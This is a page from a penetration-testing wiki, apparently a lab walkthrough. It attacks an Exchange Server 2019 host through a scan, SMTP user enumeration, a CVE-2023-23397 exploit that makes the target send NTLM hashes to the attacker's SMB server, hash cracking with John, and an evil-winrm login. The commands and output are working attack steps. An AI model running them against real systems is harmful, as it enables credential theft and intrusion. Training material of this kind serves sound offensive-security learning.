❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Nmap
  • OWA - HTTPS 443
  • SMTP
  • CVE-2023-23397
  • John the Ripper - crack NTLM hash
  • WinRM - TCP 5985

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

OWA Exchange Server 2019

Exchange Server 2019

Nmap

nmap -p- -A <IP> -oA myHost                                     
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI

53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
| 
443/tcp   open  ssl/https
| 
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
|     
587/tcp   open  smtp                 Microsoft Exchange smtpd

| 
|_  Product_Version: 10.0.17763
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
|
| 
717/tcp   open  smtp                 Microsoft Exchange smtpd
|
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info: 
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing

OWA - HTTPS 443

git clone https://github.com/kh4sh3i/exchange-penetration-testing.git


cd exchange-penetration-testing 
                                                                                                                               
                                                                             
python3 get_exchange_version.py https://10.129.229.14                                         

Build number:15.2.1118
Exchange Server 2019

SMTP

wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt


smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists

CVE-2023-23397

git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1

The exploit requires first SMB server running (impacket)

impacket-smbserver -smb2support share .

John the Ripper - crack NTLM hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

WinRM - TCP 5985

evil-winrm -i 10.129.229.14 -u validaccount -p 'password'

PreviousBloodhoundNextActive Directory Web Services (ADWS)

Last updated 1 year ago

Was this helpful?

https://github.com/kh4sh3i/exchange-penetration-testing.git
https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true
GitHub - BronzeBee/cve-2023-23397: Python script for sending e-mails with CVE-2023-23397 payload using SMTPGitHub
CVE-2023-23397
Logo